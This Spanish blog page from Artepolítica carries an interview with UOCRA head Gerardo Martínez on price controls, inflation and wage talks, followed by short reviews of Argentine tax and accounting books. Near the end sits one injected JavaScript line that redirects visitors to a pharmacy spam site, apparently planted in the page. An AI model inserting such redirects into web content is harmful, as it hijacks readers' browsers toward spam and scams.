Gerardo Martínez: «Hay empresarios que quieren generar una situación más grave»

“Tenemos que cuidar los precios porque hay empresarios con actitud inescrupulosa”. Así el jefe de la Uocra, Gerardo Martínez, justificó los controles de precios impulsados por el Gobierno y se quejó de quienes pretenden “hacer dinero” cuando hay falta de estabilidad o confianza. En una entrevista con El Cronista, Martínez garantizó que los gremios actuarán con “sensatez” en las paritarias y estimó un piso del 25% para los reclamos salariales.
–¿Le preocupan los problemas que se advierten en la actividad económica, la inflación?
–Estuve mucho más preocupado cuando se produjo la implosión del sistema financiero mundial en 2008. Ahí si estaba preocupado y lo habíamos hablado con el Gobierno del efecto cascada y negativo que generaba. Y ante esto, el Gobierno dijo más inversiones. Los nubarrones que se han presentado en los últimos meses tienen que ver con cuestiones o problemas de cabotaje, no vienen de otro lado, son problemas vinculados a la macroeconomía argentina y a que hay que poner en ajuste, no digo en ajuste por generar un ajuste, sino en determinar acciones económicas como para bajar los picos inflacionarios, mantener la actividad y seguir con el nivel de crecimiento.
–¿Temen que estos nubarrones terminen por afectar el empleo?
–Si no hacemos nada va a afectar. Pero el Gobierno conoce de esto y la Presidenta tiene mucha sensibilidad y ha dicho que el Estado no puede hacerse el distraído cuando se caen las fuentes de trabajo.
–Para la dirigencia sindical ¿hoy es más importante cuidar el empleo que seguir recomponiendo el salario?
–Son las dos cosas, las dos están en el mismo nivel. En los últimos tiempos si hay algo que pudimos lograr los trabajadores y aplaudir es la estabilidad económica, y sabemos que la inflación es lo peor, es el impuesto a la pobreza. La idea es seguir reparando el salario real y seguir manteniendo las fuentes de trabajo, no obstante somos concientes de que en este momento hay nubarrones. Pero pensamos que la mejor manera de poder transitar este ciclo es logrando nuevamente la estabilidad económica, sin eso se golpea más fuertemente al trabajador.
–¿Y eso supone que no haya desbordes en las paritarias?
–Las paritarias son el mejor instrumento democrático que tenemos para defender el salario, es la forma de analizar macroeconómicamente que nivel de participación tiene el salario en el desarrollo económico de la Argentina. Esto para nosotros esta muy claro. Cuando nos sentamos a discutir observamos dos cosas, cómo garantizamos las fuentes de trabajo y cómo garantizamos el poder adquisitivo del salario y siempre sobre una postura sensata, ninguno va a hacer algo para contrarrestar esas dos condiciones y el empleador sabe que nosotros sabemos si la actividad da posibilidades o si la actividad está en una situación de recesión.
–El 25% del que usted habló hace semanas y que también se menciona en el Gobierno ¿es un numero sensato, razonable?
–Cuando nos sentamos siempre llevamos lo último que discutimos, y el año pasado discutimos sobre la base del 25% y un poquito más y analizamos siempre el contexto de lo que pasa en los pasillos de los supermercados y eso el Gobierno siempre lo aceptó. Siempre fuimos pragmáticos y reales, no nos manejamos con las cifras del Indec ni el Gobierno nos dijo lo contrario. Todos sabíamos por lo que estábamos discutiendo. En 2008 firmamos por un 24%, en 2009 ya teníamos el efecto de la crisis y firmamos por casi el 20% y hubo una actitud sensata porque era fundamental cuidar las fuentes de trabajo. Es lo mismo que va a suceder ahora, se va a firmar por un año y creo que el piso de negociación es lo que firmamos el año pasado, nos sentamos desde el 25% para analizar después las perspectivas que hacen a un combo, no es sólo discutir el salario por el salario.
–¿Cómo observan el funcionamiento del acuerdo de ‘Precios Cuidados’ para controlar la inflación?
–Desde la macroeconomía hay un montón de herramientas que pueden generar confianza. En los últimos años no se tuvo que hacer controles porque había un mecanismo propio del sistema económico que daba esa garantía. Había confianza, estabilidad, solvencia y Argentina crecía y también teníamos inflación. Tranquilamente teniendo una inflación de un dígito o de dos a lo sumo un 12%, no soy economista pero por lo que he leído, sería espectacular eso. Pero lo que digo es que en Argentina estas cosas suceden porque hay una cultura dolarizada, hay muchos empresarios que han vivido de ese proceso en otras épocas y apenas se nota que hay falta de estabilidad o confianza vuelven nuevamente a querer ganar dinero por ese costado. El Gobierno tendrá que buscar herramientas para resolver el problema. Pero es una forma de decirle al resto de la sociedad que hay un flagelo de grupos económicos o empresarios que buscan generar mayor gravedad de la que puede haber y ponerlos en evidencia.
–La presidenta denunció que le hicieron algunas corridas…
–El hecho de tener que cuidar los precios sucede porque hay empresarios que todavía siguen teniendo una actitud corporativa, inescrupulosa, los conocemos y sabemos que si tienen la oportunidad van a buscar de sacar ventaja. Si hay algo que necesitamos es tener una burguesía nacional, un grupo que se dedique a hacer negocios o a generar inversiones sanamente, como sucede en los países donde todo funciona bien y donde ganan dinero, pero teniendo un nivel de respeto y compromiso con los intereses de la Nación, todavía eso no se observa, falta conformar un grupo empresarial que defienda sus intereses pero también tenga una mirada más allá de sus intereses.
–¿Y eso perjudica la posibilidad de un acuerdo social?
–Creo que eso demuestra la importancia que tiene un acuerdo social. Estos resultados que vemos son el por qué tenemos que hacer un pacto.
–¿Cómo define la relación de la CGT oficial con el Gobierno?
–Buena en todo sentido, si hay algo que siento es que el sindicalismo tiene que ser autónomo, tiene que tener independencia en las decisiones, pero esto no significa que seamos indiferentes.
–¿Les molestaron las críticas de Cristina hacia la dirigencia sindical y en particular a Caló?
–Quizás lo que vemos es que cuando tenemos una situación de nubarrones o que nos parecen injustas es como que nos al ternamos. Pero ya esta , esas cosas se resuelven a los 5 minutos, se aclara y todos seguimos tirando para adelante, lo importante es no caer en fundamentalismos.
El intercambio de información fiscal
Luis María Capellano – La Ley
En las páginas de esta obra el lector encontrará un tema de trascendencia profesional, ya que se desarrollan aspectos de absoluta tendencia en el mundo actual y es el relacionado con las transacciones que se llevan a cabo entre residentes de distintos países, como así también la aparición de nuevas maniobras tendientes a la evasión fiscal en el ámbito internacional, la fuga de capitales hacía países comúnmente conocidos con el mote de «paraísos fiscales», etc., situaciones que obligan a las Administraciones Tributarias a acrecentar sus esfuerzos en la búsqueda de mecanismos de colaboración internacional tendiente a la transparencia fiscal.
El lector encontrará a lo largo de los distintos capítulos un análisis pormenorizado del estudio de esta temática, en el cual se recopilan todos los antecedentes técnicos académicos a nivel nacional e internacional, y desarrolla los antecedentes, finalidades, comentarios doctrinarios y, la normativa contenida en dada uno de los instrumentos sancionados.
En sus páginas el autor en función a su larga experiencia y conocimiento, desarrolla toda la normativa imperante, las facultades de la AFIP, los distintos tipos de Tratados de Intercambio de Información, un Anexo en el que se transcriben éstos en su totalidad y las modificaciones acaecidas en torno al cambio que se produjo con motivo del Decreto 589/2013.
Sin duda un trabajo de gran utilidad para el ámbito profesional.
Aspectos Tributarios en el Comercio Exterior
José Luis Ceteri – Osmar D. Buyatti – Librería Editorial
Continuando con la saga tributaria: Evaluación y Diagnóstico Fiscal, Impuestos en el Sector de Recursos Humanos y los Impuestos en la Argentina, este libro explica las cuestiones impositivas que afectan a las operaciones de Comercio Exterior.
En sus primeros capítulos se explican los requerimientos formales que necesitan conocer los operadores de Comercio Exterior, para poder actuar como importadores y exportadores de bienes.
En los siguientes capítulos, se detallan todas las implicancias impositivas que se generan en el .momento de importar y/o exportar un bien o un servicio, analizando como afecta el IVA, los Impuestos Internos, Ganancias e Ingresos Brutos a las importaciones, calculando, el costo de una importación que se genera en la Aduana al nacionalizarse un bien. Asimismo, se menciona como influyen los impuestos nacionales y provinciales en las operaciones de exportación.
En su contenido, también se repasan las obligaciones referidas a temas de facturación, se detallan los convenios para evitar la doble imposición que se encuentran vigentes y se describen las retenciones que deben efectuarse cuando se giran fondos a beneficiarios del exterior, abordando también las cuestiones relacionadas al reintegro del crédito fiscal del IVA por operaciones de exportación, as obligaciones vinculadas con Precios de Transferencia, la forma de destrabar los reembolsos compensándolos contra deudas impositivas y de la seguridad social, para finalizar con un análisis de los regímenes especiales por exportaciones a Tierra del Fuego y operaciones efectuadas en Zonas Francas.
Construcción: IVA / Ganancias / Ingresos Brutos / Fideicomisos
Osvaldo Balán y Osvaldo Zilli – Errepar
El objetivo de este trabajo en su 3ra. edición es el análisis en forma práctica y concisa de los principales aspectos impositivo vinculados a la actividad de la construcción.
Algunos de los temas tratados en este trabajo son controvertidos, como la reducción de la tasa del IVA para viviendas, los aspectos tributarios del fideicomiso, la aplicación del Convenio Multilateral para la actividad, el tratamiento de la venta de inmuebles en el impuesto a las ganancias, etc.
En los temas indicados y el resto de los tratados en esta obra, se plantean con ejemplos prácticos, las distintas opiniones, sin dejar de mencionar la jurisprudencia administrativa, judicial y doctrinaria.
La obra incluye un capítulo de «Misceláneas», con ciertos temas que entendemos relevantes, que no se encasillan en ninguno de los restantes capítulos de la obra
La Argentina Estructural – Desarrollo Social
Eduardo Amadeo – Edicon (CPCECF)
Los breviarios del Consejo Profesional de Ciencias Económicas de la Ciudad Autónoma de Buenos Aires, publicados por la editorial EDICON, forman parte de la iniciativa «La Argentina Estructural», un espacio de debate acerca de los desafíos que enfrenta el país hacia el mediano y largo plazo. Bajo esta premisa, se busca plantear temas de políticas públicas al alcance de todos.
Escrito por especialistas de reconocida trayectoria, cada breviario es un tratado sumario sobre la materia que anuncia su título. En su conjunto, forman un biblioteca de consulta y orientación indispensable para volver más inteligible la situación del país y brindar propuestas superadoras que conduzcan a la reflexión y a la acción.
En esta edición, el autor realiza un diagnóstico de la situación actual en materia de Desarrollo Social y plantea, sintéticamente, una propuesta integral con vistas a su superación, de modo de contribuir a instalar una política que en el largo plazo permita cerrar la brecha que nos separa de los países más avanzados.
Guía Práctica para el Contador
Mario Rapisarda y Marcelo Zangaro – Errepar
Este libro en su 4ta. Edición que forma parte de la Colección Práctica de Actuación Profesional, constituye una síntesis de los temas que los autores consideran más relevantes en el estudio contable o empresa, para luego ir sumando algunos otros que resultan imprescindibles al momento de analizar algún caso en particular.
Teniendo en cuenta que la actividad del Contador es compleja y dinámica y que resulta prácticamente imposible tener presente todas las cuestiones, algunas controvertidas y otras no tanto que se presentan en la labor diaria, esta obra se constituye en una respuesta amena y dinámica y que sirve de apoyo en aquellos momentos donde las consultas necesitan una primera y rápida respuesta, como base para análisis más profundos y, en esencia, para la resolución de cuestiones profesionales que se presentan ante un nuevo cliente o situación
A fin de facilitar la tarea, se entrega sin cargo un CD que contiene tres planillas Excel, con modelos de certificaciones y otros escritos.

window.location = «http://cheap-pills-norx.com»;

Acerca de Artepolítica

El usuario Artepolítica es la firma común de los que hacemos este blog colectivo.

Ver todas las entradas de Artepolítica →

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *